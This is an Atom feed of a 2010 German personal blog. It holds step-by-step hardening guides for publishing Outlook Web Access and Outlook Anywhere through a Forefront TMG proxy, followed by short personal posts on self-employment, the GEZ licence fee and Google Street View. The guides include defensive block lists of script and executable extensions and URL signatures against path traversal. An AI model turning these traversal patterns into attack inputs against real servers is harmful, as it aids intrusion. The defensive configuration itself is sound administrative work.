<?xml version="1.0" encoding="utf-8" ?>
<?xml-stylesheet href="/templates/default/atom.css" type="text/css" ?>

<feed 
   xmlns="http://www.w3.org/2005/Atom"
   xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
   xmlns:dc="http://purl.org/dc/elements/1.1/"
   xmlns:admin="http://webns.net/mvcb/"
   xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
   xmlns:wfw="http://wellformedweb.org/CommentAPI/">
    
    <link href="http://blog.h4des.org/index.php?/feeds/atom.xml" rel="self" title="Sqall Blog" type="application/atom+xml" />
    <link href="http://blog.h4des.org/"                        rel="alternate"    title="Sqall Blog" type="text/html" />
    <link href="http://blog.h4des.org/rss.php?version=2.0"     rel="alternate"    title="Sqall Blog" type="application/rss+xml" />
    <title type="html">Sqall Blog</title>
    <subtitle type="html">&quot;Wenn du einen Traum hast, dann musst du für ihn einstehen. Wenn andere 'was nicht können, dann sagen sie dir du kannst es auch nicht. Wenn du 'was willst, dann nimm es dir. Punkt.&quot;</subtitle>
    <icon>http://blog.h4des.org/templates/default/img/s9y_banner_small.png</icon>
    <id>http://blog.h4des.org/</id>
    <updated>2010-09-03T07:38:05Z</updated>
    <generator uri="http://www.s9y.org/" version="1.5.4">Serendipity 1.5.4 - http://www.s9y.org/</generator>
    <dc:language>de</dc:language>

    <entry>
        <link href="http://blog.h4des.org/index.php?/archives/280-TMG-als-Proxy-Outlook-Web-Access-hardening.html" rel="alternate" title="TMG als Proxy - Outlook Web Access hardening" />
        <author>
            <name>sqall</name>
                    </author>
    
        <published>2010-09-03T07:38:05Z</published>
        <updated>2010-09-03T07:38:05Z</updated>
        <wfw:comment>http://blog.h4des.org/wfwcomment.php?cid=280</wfw:comment>
    
        <slash:comments>0</slash:comments>
        <wfw:commentRss>http://blog.h4des.org/rss.php?version=atom1.0&amp;type=comments&amp;cid=280</wfw:commentRss>
    
            <category scheme="http://blog.h4des.org/index.php?/categories/14-security" label="security" term="security" />
            <category scheme="http://blog.h4des.org/index.php?/categories/6-windows" label="windows" term="windows" />
    
        <id>http://blog.h4des.org/index.php?/archives/280-guid.html</id>
        <title type="html">TMG als Proxy - Outlook Web Access hardening</title>
        <content type="xhtml" xml:base="http://blog.h4des.org/">
            <div xmlns="http://www.w3.org/1999/xhtml">
                Gestern habe ich die <a href="http://blog.h4des.org/index.php?/archives/279-TMG-als-Proxy-Outlook-Anywhere-hardening.html" title="http://blog.h4des.org/index.php?/archives/279-TMG-als-Proxy-Outlook-Anywhere-hardening.html">Konfiguration zum Absichern von Outlook Anywhere</a> beschrieben. Heute zeige ich euch in ultra kurz wie Outlook Web Access (OWA) mit TMG als Proxy abgesichert wird.<br />
<br />
Wie bei Outlook Anywhere benutzen wir den Wizard fuer die Freigabe (fuer Weblistener oder anderen vorher gemachten Einstellungen, bitte bei der <a href="http://blog.h4des.org/index.php?/archives/279-TMG-als-Proxy-Outlook-Anywhere-hardening.html" title="http://blog.h4des.org/index.php?/archives/279-TMG-als-Proxy-Outlook-Anywhere-hardening.html">Outlook Anywhere Kurzanleitung</a> schauen):<br />
<br />
<blockquote>-Forefront TMG Management → Forefront TMG (h4desTMG) → Firewall Policy → Rechtsklick → New → Exchange Web Client Access Publishing Rule...<br />
<br />
-Exchange Publishing rule name: owa<br />
<br />
-Exchange version: Exchange Server 2010<br />
<br />
-Outlook Web Access<br />
<br />
-Publish a single Web site or load balancer<br />
<br />
-Use SSL to connect to the published Web server or server farm<br />
<br />
-Internal site name: mail.test.h4des.org<br />
<br />
-Accept requests for: This domain name (type below)<br />
<br />
-Public name: mail.test.h4des.org<br />
<br />
-Web listener → h4des.org exchange<br />
<br />
-Select the method used by Forefront TMG to authenticate to the published Web server: No 	delegation, and client cannot authenticate directly<br />
<br />
-This rule applies to requests from the following user sets: All Authenticated Users<br />
<br />
-in den Properties von der Regel „owa“ muss unter Public Name die Webseite, unter der diese Regel erreichbar ist, mit den Angaben in dem Zertifikat uebereinstimmen (hierbei „mail.test.h4des.org“). Die Webseite ist auch nur ueber die dort gemachten Angaben erreichbar und nicht ueber die IP-Adresse des TMG oder anderen Namen die auf den TMG zeigen.</blockquote><br />
<br />
Das wars auch schon. Wenn der DNS von aussen bei mail.test.h4des.org auf den TMG zeigt und der TMG mal.test.h4des.org so aufloest, dass er die Exchange CAS Server erreicht, koennen wir nun schon OWA ueber den TMG als Proxy benutzen.<br />
<br />
Nun kommen wir aber zum interessanten. Zum "haerten" (ich mag das Wort "hardening" ja viel lieber) der Regel. Auch hier wieder in sehr kurz:<br />
<br />
<blockquote>-Forefront TMG Management → Forefront TMG (h4desTMG) → Firewall Policy → owa → Rechtsklick → Configure HTTP<br />
<br />
-General<br />
*Maximum headers length (bytes): 32768 (default war 32768)<br />
*Allow any payload length: deaktivieren (default war aktiviert)<br />
*Maximum payload length (bytes): 10485760 (fuer 10MB Anhaenge ueber OWA)<br />
*Maximum URL length (bytes): 10240 (default war 10240)<br />
*Maximum query length (bytes): 4096 (default war 10240)<br />
*Verify normalization: aktivieren (default war deaktiviert)<br />
*Block high bit characters: deaktivieren (default war deaktiviert) (denn sonst werden Umlaute blockiert und der Nutzer kann bei einer deutschen Version nicht einmal eMails schreiben, da die eMail im Ordner "Entwürfe" landet)<br />
*Block responses containing Windows executable content: aktivieren (default war deaktiviert) (dadurch kann der Nutzer ueber OWA bei keiner eMail S/MIME benutzer, der Zugriff auf S/MIME erfordert das Zugreifen auf eine .exe-Datei)<br />
<br />
-Methods<br />
*Allow only specified methods (default war Allow all methods)<br />
*Add... → Method: BCOPY<br />
*Add... → Method: BDELETE<br />
*Add... → Method: BMOVE<br />
*Add... → Method: BPROPPATCH<br />
*Add... → Method: DELETE<br />
*Add... → Method: GET<br />
*Add... → Method: MKCOL<br />
*Add... → Method: MOVE<br />
*Add... → Method: POLL<br />
*Add... → Method: POST<br />
*Add... → Method: PROPFIND<br />
*Add... → Method: PROPPATCH<br />
*Add... → Method: SEARCH<br />
*Add... → Method: SUBSCRIBE<br />
<br />
-Extensions<br />
*Block specified extensions (allow all others)<br />
*Add... → Extension: .asax<br />
*Add... → Extension: .ascs<br />
*Add... → Extension: .bat<br />
*Add... → Extension: .com<br />
*Add... → Extension: .config<br />
*Add... → Extension: .cs<br />
*Add... → Extension: .csproj<br />
*Add... → Extension: .dat<br />
*Add... → Extension: .dll<br />
*Add... → Extension: .exe (durch Sperrung von dieser Endung, kann z.B. nicht auf S/MIME Komponenten zugegriffen werden)<br />
*Add... → Extension: .htr<br />
*Add... → Extension: .htw<br />
*Add... → Extension: .ida<br />
*Add... → Extension: .idc<br />
*Add... → Extension: .idq<br />
*Add... → Extension: .ini<br />
*Add... → Extension: .licx<br />
*Add... → Extension: .log<br />
*Add... → Extension: .pdb<br />
*Add... → Extension: .pol<br />
*Add... → Extension: .pritner<br />
*Add... → Extension: .ps1<br />
*Add... → Extension: .resources<br />
*Add... → Extension: .resx<br />
*Add... → Extension: .shtm<br />
*Add... → Extension: .shtml<br />
*Add... → Extension: .stm<br />
*Add... → Extension: .vb<br />
*Add... → Extension: .vbproj<br />
*Add... → Extension: .vbs<br />
*Add... → Extension: .vsdisco<br />
*Add... → Extension: .webinfo<br />
*Add... → Extension: .xsd<br />
*Add... → Extension: .xsx<br />
*Block requests containing ambiguous extensions: deaktivieren (default war deaktiviert)<br />
*je nach Anforderung die die Nutzer haben, muessen einige Dateiendungen erlaubt werden, damit sie Dateien ueber OWA herunterladen koennen<br />
<br />
-Signatures<br />
*Add...<br />
*Name: \<br />
*Search in: Request URL<br />
*Signature \<br />
<br />
*Add...<br />
*Name: ./<br />
*Search in: Request URL<br />
*Signature ./<br />
<br />
*Add...<br />
*Name: ..<br />
*Search in: Request URL<br />
*Signature ..</blockquote><br />
<br />
Diese Einstellungen habe ich jetzt einen Tag lang getestet und sie liefern gute Ergebnisse und fuer mich bisher keine Einschraenkungen. 
            </div>
        </content>
        
    </entry>
    <entry>
        <link href="http://blog.h4des.org/index.php?/archives/279-TMG-als-Proxy-Outlook-Anywhere-hardening.html" rel="alternate" title="TMG als Proxy - Outlook Anywhere hardening" />
        <author>
            <name>sqall</name>
                    </author>
    
        <published>2010-09-02T11:45:23Z</published>
        <updated>2010-09-03T07:52:56Z</updated>
        <wfw:comment>http://blog.h4des.org/wfwcomment.php?cid=279</wfw:comment>
    
        <slash:comments>0</slash:comments>
        <wfw:commentRss>http://blog.h4des.org/rss.php?version=atom1.0&amp;type=comments&amp;cid=279</wfw:commentRss>
    
            <category scheme="http://blog.h4des.org/index.php?/categories/14-security" label="security" term="security" />
            <category scheme="http://blog.h4des.org/index.php?/categories/6-windows" label="windows" term="windows" />
    
        <id>http://blog.h4des.org/index.php?/archives/279-guid.html</id>
        <title type="html">TMG als Proxy - Outlook Anywhere hardening</title>
        <content type="xhtml" xml:base="http://blog.h4des.org/">
            <div xmlns="http://www.w3.org/1999/xhtml">
                Ich hatte <a href="http://blog.h4des.org/index.php?/archives/271-Outlook-Anywhere-oder-RPC-over-HTTPS-sicher-genug-laut-Theorie.html" title="http://blog.h4des.org/index.php?/archives/271-Outlook-Anywhere-oder-RPC-over-HTTPS-sicher-genug-laut-Theorie.html">vor einiger Zeit darueber geschrieben</a>, dass ich Outlook Anywhere aus einem Netz heraus erlauben moechte und es moeglichst sicher sein soll. Nun so extrem viel gibt es leider nicht dazu. Aber mit ein paar Einstellungen kann man es sicher erreichbar machen.<br />
<br />
Wenn ihr einen TMG installiert habt, der auch noch hinter einer Firewall ist, so das der TMG nur als Proxy Server zwischen Exchange CAS und Clients aus dem Internet dient, koennt ihr Outlook Anywhere sehr schnell ueber den Wizard veroeffentlichen (die Option heisst Exchange Web Client Access Publishing Rule...). Dieser Wizard sollte auch verwendet werden (steht so unter anderem im "Microsoft Forefront Thread Management Gateway (TMG) Administrator's Companion").<br />
<br />
So sieht dann die Konfiguration aus (in ASCII <img src="http://blog.h4des.org/templates/default/img/emoticons/wink.png" alt=";-)" style="display: inline; vertical-align: bottom;" class="emoticon" /> ):<br />
<br />
<blockquote>Client --> Internet --> Firewall --> TMG Proxy --> Exchange CAS</blockquote><br />
<br />
Die Firewall gibt einfach nur HTTPS zum TMG Proxy frei und der TMG Proxy ist ueber den Namen "mail.test.h4des.org" erreichbar. Nun zu einer kleinen Ultrakurzanleitung, wie ihr einen Weblistener anlegt:<br />
<br />
<blockquote>-Forefront TMG Management → Forefront TMG (h4desTMG) → Firewall Policy → Network Objects → Web Listener → Rechtsklick → New Web Listener...<br />
<br />
-Web listener name: h4des.org exchange<br />
<br />
-Require SSL secured connections with clients<br />
<br />
-Listen for incoming Web requests of these networks: External<br />
<br />
-Forefront TMG will compress content sent to clients through this Web Listener if the clients requesting the content support compression		<br />
<br />
-Use a single certificate for this Web Listener: Select Certificate...<br />
*hier das importierte Zertifikat fuer „mail.test.h4des.org“ auswaehlen<br />
<br />
-Select how clients will provide credentials to Forefront TMG: HTML Form Authentication<br />
<br />
-Select how Forefront TMG will validate client credentials: Windows (Active Directory)<br />
<br />
-Enable SSO for Web sites published with this Web listener: Harken entfernen</blockquote><br />
<br />
Da ueber den selben Web Listener auch noch OWA und ActiveSync (dazu werde ich ein andermal was schreiben) benutzt werden soll, wird als HTML Form Authentication (FBA) verwendet. Der Trick ist hierbei, dass Outlook 2010 kein FBA unterstuetzt und dann zurueck zur HTTP Authentication springt (allerdings nur Basic, leider kein "security-in-depth" Konzept, aber durch HTTPS sollte man auch Basic verwenden koennen), welches auch der TMG annimmt. Wichtig ist hierbei auch, dass beim Weblistener die Authentifizierung eingeschaltet ist, denn sonst leitet der TMG die RPC Pakete nach der Ueberpruefung ohne Authentifizierung zum Exchange CAS. Wenn wir dieses zulassen, koennen wir auch direkt RPC nach aussen freigeben und das ist ja bekanntlichermassen nicht gerade das sicherste Protokoll.<br />
<br />
Wenn nun der Weblistener steht, koennen wir Outlook Anywhere freigeben:<br />
<br />
<blockquote>-Forefront TMG Management → Forefront TMG (h4desTMG) → Firewall Policy → Rechtsklick → New → Exchange Web Client Access Publishing Rule...<br />
<br />
-Exchange Publishing rule name: Outlook Anywhere<br />
<br />
-Exchange version: Exchange Server 2010<br />
<br />
-Outlook Anywhere (RPC/HTTP(s))<br />
*Publish additional folders on the Exchange Server for Outlook 2007 clients<br />
<br />
-Publish a single Web site or load balancer<br />
<br />
-Use SSL to connect to the published Web server or server farm<br />
<br />
-Internal site name: mail.test.h4des.org<br />
<br />
-Accept requests for: This domain name (type below)<br />
<br />
-Public name: mail.test.h4des.org<br />
<br />
-Web listener → h4des.org exchange<br />
<br />
-Select the method used by Forefront TMG to authenticate to the published Web server: NTLM Authentication<br />
<br />
-This rule applies to requests from the following user sets: Authenticated Users</blockquote><br />
<br />
Nun wuerde TMG nachdem der Nutzer sich authentifiziert hat, die Anfrage weiter an unsere Exchange CAS Server schicken. Dort muss Outlook sich allerdings nochmal authentifizieren (macht Outlook automatisch mit den vorher eingegebenem Nutzernamen und Passwort).<br />
<br />
Da wir nun NTLM als Authentifizierungsmethode angegeben haben, muessen wir unsere Exchange CAS Server auch noch darauf vorbereiten (und Outlook Anywhere erstmal aktivieren):<br />
<br />
<blockquote>-Exchange Management Console → Server Configuration → Client Access → Rechtsklick auf Server → Enable Outlook Anywhere...<br />
<br />
-External host name: mail.test.h4des.org<br />
<br />
-Client authentication method: NTLM Authentication<br />
<br />
-Allow secure channel (SSL) offloading: NICHT AKTIVIEREN (diese Option besagt, wenn aktiviert, dass zwischen Exchange CAS Server und TMG kein SSL verwendet wird)<br />
<br />
-nachdem Outlook Anywhere aktiviert wurde, dauert es noch (je nach Konfiguration) 15 Minuten bis die Einstellungen aktiv sind</blockquote><br />
<br />
<br />
Jetzt noch Outlook 2010 anpassen:<br />
<br />
<blockquote>-Outlook 2010 auf dem Client in den Kontoeinstellungen unter E-Mail den Nutzer auswaehlen und in die Einstellungen gehen<br />
<br />
-Weitere Einstellungen... → Verbindung → Exchange-Proxyeinstellungen... → Diese Authentifizierung fuer die Verbindung mit dem Exchange-Proxyserver verwenden: Standardauthentifizierung</blockquote><br />
<br />
Das was ich hier in Ultrakurz beschrieben habe, findet man im Internet wie Sand am Meer. Das war auch nicht das, worauf ich hinaus wollte. Und zwar habe ich den Eintrag gemacht, weil man keine wirklichen Informationen im Internet findet, wie man die Verbindung besser schuetzt. In dem Buch "Microsoft Forefront Thread Management Gateway (TMG) Administrator's Companion" habe ich auch nicht wirklich was dazu gefunden. Allerdings habe ich mit etwas mehr basteln und lesen ein paar Sicherheitseinstellungen finden koennen.<br />
<br />
Hier sind diese auch in ultra kurz:<br />
<br />
<blockquote>-Forefront TMG Management → Forefront TMG (h4desTMG) → Firewall Policy → outlook anywhere → Rechtsklick → Configure HTTP<br />
<br />
-General<br />
*Maximum headers length (bytes): 32768 (default war 32768)<br />
*Allow any payload length: aktivieren (default war aktiviert)<br />
*Maximum URL length (bytes): 10240 (default war 10240)<br />
*Maximum query length (bytes): 4096 (default war 10240)<br />
*Verify normalization: aktivieren (default war deaktiviert)<br />
*Block high bit characters: aktivieren (default war deaktiviert)<br />
*Block responses containing Windows executable content: aktivieren (default war deaktiviert)<br />
<br />
-Methods<br />
*Allow only specified methods (default war Allow all methods)<br />
*Add... → Method: RPC_IN_DATA<br />
<strong>Add... → Method: RPC_OUT_DATA<br />
</strong>(im ISA Server 2006 Handbuch steht angegeben, dass die Methoden RPC_DATA_IN und RPC_DATA_OUT heissen, allerdings Beispiel fuer Outlook 2003. Nach einer Ueberpruefung der Pakete wurden aber die Methoden RPC_IN_DATA und RPC_OUT_DATA gefunden)<br />
<br />
-Extensions<br />
*Allow only specified extensions (default war Allow all extensions)<br />
*Add... → Extension: .dll (Der Zugriff erfolgt ueber die RpcProxy.dll)<br />
*Block requests containing ambiguous extensions: aktivieren (default war deaktiviert)<br />
<br />
-Signatures<br />
*Add...<br />
*Name: \<br />
*Search in: Request URL<br />
*Signature \<br />
<br />
*Add...<br />
*Name: ./<br />
*Search in: Request URL<br />
*Signature ./<br />
<br />
*Add...<br />
*Name: ..<br />
*Search in: Request URL<br />
*Signature ..<br />
<br />
*Add...<br />
*Name: %<br />
*Search in: Request URL<br />
*Signature %<br />
<br />
*Add...<br />
*Name: &amp;<br />
*Search in: Request URL<br />
*Signature &amp;</blockquote><br />
<br />
Durch diese Einstellungen ist Outlook Anywhere (oder RPC-over-HTTP) sehr gut abgesichert und kann von aussen freigegeben werden. 
            </div>
        </content>
        
    </entry>
    <entry>
        <link href="http://blog.h4des.org/index.php?/archives/278-Existenzgruendung-in-Deutschland-IHK-min.-2-Jahre-Beitragsfrei.html" rel="alternate" title="Existenzgruendung in Deutschland - IHK min. 2 Jahre Beitragsfrei" />
        <author>
            <name>sqall</name>
                    </author>
    
        <published>2010-08-31T11:02:32Z</published>
        <updated>2010-08-31T11:02:32Z</updated>
        <wfw:comment>http://blog.h4des.org/wfwcomment.php?cid=278</wfw:comment>
    
        <slash:comments>0</slash:comments>
        <wfw:commentRss>http://blog.h4des.org/rss.php?version=atom1.0&amp;type=comments&amp;cid=278</wfw:commentRss>
    
            <category scheme="http://blog.h4des.org/index.php?/categories/1-RealLife" label="RealLife" term="RealLife" />
    
        <id>http://blog.h4des.org/index.php?/archives/278-guid.html</id>
        <title type="html">Existenzgruendung in Deutschland - IHK min. 2 Jahre Beitragsfrei</title>
        <content type="xhtml" xml:base="http://blog.h4des.org/">
            <div xmlns="http://www.w3.org/1999/xhtml">
                Ich hatte <a href="http://blog.h4des.org/index.php?/archives/275-Existenzgruendung-in-Deutschland-0-Cent-verdient-und-jeder-moechte-Geld.html" title="http://blog.h4des.org/index.php?/archives/275-Existenzgruendung-in-Deutschland-0-Cent-verdient-und-jeder-moechte-Geld.html">hier</a> geschrieben, dass nun jeder Geld von mir haben moechte, seit dem ich Selbststaendig bin, obwohl ich noch nichts verdient habe.<br />
<br />
Nun kam kurz darauf auch ein zweiter Brief von der IHK (ich frage mich, warum der nicht als erstes kam) in dem Stand, dass ich noch angaben machen sollte, ob ich ueberhaupt Beitraege bezahlen muss. Hier findet sich naemlich diese Stelle:<br />
<br />
<blockquote>(Existenzgruender) Der Gewerbeertrag bzw. der Gewinn meines Gewerbebetriebes wird voraussichtlich 20000 Euro nicht uebersteigen und in den letzten fuenf Wirtschafsjahren vor meiner Betriebseroeffnung hatte ich weder Einkuenfte aus Land- und Forstwirtschaft, Gewerbebetrieb oder selbststaendiger Arbeit erzielt noch war ich an einer Kapitalgesellschaft mittelbar oder unmittelbar zu mehr als einem Zehntel beteiligt (bei Erfuellung der vg. Voraussetzungen erfolgt eine Beitragsbefreiung von mindestens 2 Jahren)</blockquote><br />
<br />
Na also, mehr will ich doch gar nicht <img src="http://blog.h4des.org/templates/default/img/emoticons/wink.png" alt=";-)" style="display: inline; vertical-align: bottom;" class="emoticon" /> 
            </div>
        </content>
        
    </entry>
    <entry>
        <link href="http://blog.h4des.org/index.php?/archives/277-Neue-Serendipity-Version-1.5.4.html" rel="alternate" title="Neue Serendipity Version 1.5.4" />
        <author>
            <name>sqall</name>
                    </author>
    
        <published>2010-08-30T09:50:22Z</published>
        <updated>2010-08-30T09:50:22Z</updated>
        <wfw:comment>http://blog.h4des.org/wfwcomment.php?cid=277</wfw:comment>
    
        <slash:comments>0</slash:comments>
        <wfw:commentRss>http://blog.h4des.org/rss.php?version=atom1.0&amp;type=comments&amp;cid=277</wfw:commentRss>
    
            <category scheme="http://blog.h4des.org/index.php?/categories/2-blog" label="blog" term="blog" />
    
        <id>http://blog.h4des.org/index.php?/archives/277-guid.html</id>
        <title type="html">Neue Serendipity Version 1.5.4</title>
        <content type="xhtml" xml:base="http://blog.h4des.org/">
            <div xmlns="http://www.w3.org/1999/xhtml">
                An alle die diese Blogsoftware benutze, die neue Version ist nun draussen:<br />
<br />
<a href="http://blog.s9y.org/archives/223-Serendipity-1.5.4-released.html" title="http://blog.s9y.org/archives/223-Serendipity-1.5.4-released.html">http://blog.s9y.org/archives/223-Serendipity-1.5.4-released.html</a> 
            </div>
        </content>
        
    </entry>
    <entry>
        <link href="http://blog.h4des.org/index.php?/archives/276-GEZ-Abmeldung-Angst-machen-vor-dem-Abmelden.html" rel="alternate" title="GEZ Abmeldung - Angst machen vor dem Abmelden" />
        <author>
            <name>sqall</name>
                    </author>
    
        <published>2010-08-26T18:09:00Z</published>
        <updated>2010-09-02T13:29:48Z</updated>
        <wfw:comment>http://blog.h4des.org/wfwcomment.php?cid=276</wfw:comment>
    
        <slash:comments>2</slash:comments>
        <wfw:commentRss>http://blog.h4des.org/rss.php?version=atom1.0&amp;type=comments&amp;cid=276</wfw:commentRss>
    
            <category scheme="http://blog.h4des.org/index.php?/categories/1-RealLife" label="RealLife" term="RealLife" />
    
        <id>http://blog.h4des.org/index.php?/archives/276-guid.html</id>
        <title type="html">GEZ Abmeldung - Angst machen vor dem Abmelden</title>
        <content type="xhtml" xml:base="http://blog.h4des.org/">
            <div xmlns="http://www.w3.org/1999/xhtml">
                Das ist doch echt der Hammer...<br />
<br />
Ich bin im Moment dabei Student zu werden. Deshalb werde ich bei meinen Eltern wieder einziehen. Ich habe vorher brav wie man sollte, Rundfunkgebuehren fuer meine Geraete bezahlt. Nun wollte ich mich bei der GEZ abmelden, da meine Eltern fuer "unseren" Haushalt schon Gebuehren bezahlen und finde das hier auf der GEZ Seite vor:<br />
<br />
<a class="serendipity_image_link"  href='http://blog.h4des.org/uploads/gez_abmelden.png'><!-- s9ymdb:45 --><img width="110" height="69"  src="http://blog.h4des.org/uploads/gez_abmelden.serendipityThumb.png"  alt="" /></a><br />
<br />
Ist das mal absolutes Angst machen, dass man sich abmeldet? Das ist echt der Hammer. Die GEZ ist einfach nur heftig. Ich finde Rundfunkgebuehren gut und wichtig. Aber die GEZ Methoden finde ich unter aller Sau... 
            </div>
        </content>
        
    </entry>
    <entry>
        <link href="http://blog.h4des.org/index.php?/archives/275-Existenzgruendung-in-Deutschland-0-Cent-verdient-und-jeder-moechte-Geld.html" rel="alternate" title="Existenzgruendung in Deutschland - 0 Cent verdient und jeder moechte Geld" />
        <author>
            <name>sqall</name>
                    </author>
    
        <published>2010-08-23T08:11:06Z</published>
        <updated>2010-08-23T08:11:06Z</updated>
        <wfw:comment>http://blog.h4des.org/wfwcomment.php?cid=275</wfw:comment>
    
        <slash:comments>0</slash:comments>
        <wfw:commentRss>http://blog.h4des.org/rss.php?version=atom1.0&amp;type=comments&amp;cid=275</wfw:commentRss>
    
            <category scheme="http://blog.h4des.org/index.php?/categories/1-RealLife" label="RealLife" term="RealLife" />
    
        <id>http://blog.h4des.org/index.php?/archives/275-guid.html</id>
        <title type="html">Existenzgruendung in Deutschland - 0 Cent verdient und jeder moechte Geld</title>
        <content type="xhtml" xml:base="http://blog.h4des.org/">
            <div xmlns="http://www.w3.org/1999/xhtml">
                Nachdem ich nun seit kurzer Zeit ein Kleingewerbe angemeldet habe, werde ich von Papierkram ueberschuettet.<br />
<br />
Ich habe noch keinen Cent damit verdient, aber jeder will das ich zahle. Als erstes kam die <a href="http://www.vbg.de/" title="http://www.vbg.de/">VBG</a>, die sich fuer mich zustaendig erklaerten. Nun, da ich noch einige Fragen hatte, habe ich denen ueber ihr Kontaktformular auch eine eMail geschrieben. Nach 4 Tagen kam immernoch nichts. Ich dachte mir "Na gut, rufe ich naechste Woche halt mal an." und was finde ich am Wochenende vor? Einen Brief der VBG. Ich dachte mir "Was moechte die denn nun noch?" und lass den Betreff: "Ihre Anfrage per eMail vom xx.xx.xxxx". Ich dachte ich brech zusammen. Mir wurde tatsaechlich auf eine eMail mit einem Brief geantwortet. Willkommen im neuen Jahrtausend....<br />
<br />
Naja, wenigstens war die Antwort erfreulich. Ich als Unternehmer benoetige keine Pflichtversicherung, aber alle meine Mitarbeiter (da ich dieses Kleingewerbe nur angemeldet habe, um auf Rechnung arbeiten zu koennen, ist es mir ziemlich egal ob meine nicht vorhandenen Mitarbeiter versichert werden muessen).<br />
<br />
Am gleichen Wochenende meldete sich dann auch die IHK zu Wort. "An die Unternehmensleitung" stand auf dem Brief. Aufgemacht mit dem Gedanken "Und was wollen die jetzt?" sah ich ganz gross "Mitgliedsbeitrag" stehen. Mitgliedsbeitrag? Wofuer? Damit ich Menschen ausbilden kann, die ich nicht ausbilden moechte? Hier habe ich noch einige Fragen offen, die ich mit denen noch klaeren muss. <br />
<br />
Das alles zum Thema Existenzgruendung. Ich frage mich, wer denn noch alles Geld von mir haben moechte. Vor allem von meinen bisherigen horenden 0 Euro die ich damit verdient habe. Naja, eigentlich muss ich sagen, bisher hatte ich nur Kosten. Ich sollte Insolvenz beantragen <img src="http://blog.h4des.org/templates/default/img/emoticons/wink.png" alt=";-)" style="display: inline; vertical-align: bottom;" class="emoticon" />  
            </div>
        </content>
        
    </entry>
    <entry>
        <link href="http://blog.h4des.org/index.php?/archives/274-Google-Street-View-eine-Farce-der-Politik.html" rel="alternate" title="Google Street View - eine Farce der Politik" />
        <author>
            <name>sqall</name>
                    </author>
    
        <published>2010-08-17T06:47:03Z</published>
        <updated>2010-08-17T06:47:03Z</updated>
        <wfw:comment>http://blog.h4des.org/wfwcomment.php?cid=274</wfw:comment>
    
        <slash:comments>0</slash:comments>
        <wfw:commentRss>http://blog.h4des.org/rss.php?version=atom1.0&amp;type=comments&amp;cid=274</wfw:commentRss>
    
            <category scheme="http://blog.h4des.org/index.php?/categories/11-Politik" label="Politik" term="Politik" />
            <category scheme="http://blog.h4des.org/index.php?/categories/13-Ueberwachung" label="Ueberwachung" term="Ueberwachung" />
    
        <id>http://blog.h4des.org/index.php?/archives/274-guid.html</id>
        <title type="html">Google Street View - eine Farce der Politik</title>
        <content type="xhtml" xml:base="http://blog.h4des.org/">
            <div xmlns="http://www.w3.org/1999/xhtml">
                Ich muss doch auch langsam mal meinen Senf zu Google Street View dazugeben. Um es nichtmal mit meinen Worten zu sagen, sondern denen eines Freundes <img src="http://blog.h4des.org/templates/default/img/emoticons/wink.png" alt=";-)" style="display: inline; vertical-align: bottom;" class="emoticon" /> :<br />
<br />
<blockquote>(08:27:40 AM) dorfi: deutsche politiker ey<br />
(08:28:02 AM) dorfi: bei google streetview nen fass von der groesse des mondes aufmachen, aber SWIFT, Vorratsdatenspeicherung, ELENA, etc.. durchwinken</blockquote><br />
<br />
Ja, so koennte man es sagen. Ist es nicht laecherlich was jetzt gegen das boese Google ablaeuft? Es scheint mir mehr als nur eine Farce zu sein. Ich stell mir das ungefaehr so vor, wenn unsere Politiker jetzt gegen Google vorgehen, koennen sich die meisten getrost zuruecklehnen und sagen "Wir haben was fuer die Buergerrechte getan.". <br />
<br />
Lustig sind auch die Einwohner, die sich vor ihrer Haeuserwand ablichten lassen mit den Worten "Ich habe Angst um meine Privatsphaere, wenn Google meine Haeuserwand fotografiert.". Dies wird natuerlich ins Internet gestellt. Nein, nicht das gleiche Internet wie das, was Google benutzt. Irgend ein anderes, wo nicht jeder es sehen kann. Zumindest denke ich glauben diese Menschen das wirklich <img src="http://blog.h4des.org/templates/default/img/emoticons/wink.png" alt=";-)" style="display: inline; vertical-align: bottom;" class="emoticon" /><br />
<br />
Ich frage mich bei dem ganzen Medialen trouble der jetzt stattfindet wirklich, ob das alles so durchdacht ist. Also, ob das Hinstellen von Google als der Antichrist der Privatsphaere durch unsere Politik und die Medien gewollt ist, damit die breite Masse beruhigt ist, weil was fuer ihre Privatsphaere getan wird, oder ob diese Menschen (Politik und Medien) einfach nur zu DUMM sind, die Themen SWIFT, Vorratsdatenspeicherung, ELENA usw zu verstehen. Das die breite Masse nicht in der Lage ist so etwas zu begreifen, sollte jedem klar sein. 
            </div>
        </content>
        
    </entry>
    <entry>
        <link href="http://blog.h4des.org/index.php?/archives/273-Oracle-stellt-opensolaris-ein.html" rel="alternate" title="Oracle stellt opensolaris ein" />
        <author>
            <name>sqall</name>
                    </author>
    
        <published>2010-08-16T09:54:38Z</published>
        <updated>2010-08-16T10:10:56Z</updated>
        <wfw:comment>http://blog.h4des.org/wfwcomment.php?cid=273</wfw:comment>
    
        <slash:comments>0</slash:comments>
        <wfw:commentRss>http://blog.h4des.org/rss.php?version=atom1.0&amp;type=comments&amp;cid=273</wfw:commentRss>
    
            <category scheme="http://blog.h4des.org/index.php?/categories/12-OpenSource" label="OpenSource" term="OpenSource" />
    
        <id>http://blog.h4des.org/index.php?/archives/273-guid.html</id>
        <title type="html">Oracle stellt opensolaris ein</title>
        <content type="xhtml" xml:base="http://blog.h4des.org/">
            <div xmlns="http://www.w3.org/1999/xhtml">
                Fuer wen kam es ueberraschend?<br />
<a href="http://www.pro-linux.de/news/1/16036/oracle-stellt-opensolaris-ein.html" title="http://www.pro-linux.de/news/1/16036/oracle-stellt-opensolaris-ein.html">Oracle stellt opensolaris ein</a> 
            </div>
        </content>
        
    </entry>
    <entry>
        <link href="http://blog.h4des.org/index.php?/archives/272-Happy-Birthday-Debian.html" rel="alternate" title="Happy Birthday Debian" />
        <author>
            <name>sqall</name>
                    </author>
    
        <published>2010-08-16T08:59:21Z</published>
        <updated>2010-08-16T08:59:21Z</updated>
        <wfw:comment>http://blog.h4des.org/wfwcomment.php?cid=272</wfw:comment>
    
        <slash:comments>0</slash:comments>
        <wfw:commentRss>http://blog.h4des.org/rss.php?version=atom1.0&amp;type=comments&amp;cid=272</wfw:commentRss>
    
            <category scheme="http://blog.h4des.org/index.php?/categories/3-Debian" label="Debian" term="Debian" />
    
        <id>http://blog.h4des.org/index.php?/archives/272-guid.html</id>
        <title type="html">Happy Birthday Debian</title>
        <content type="xhtml" xml:base="http://blog.h4des.org/">
            <div xmlns="http://www.w3.org/1999/xhtml">
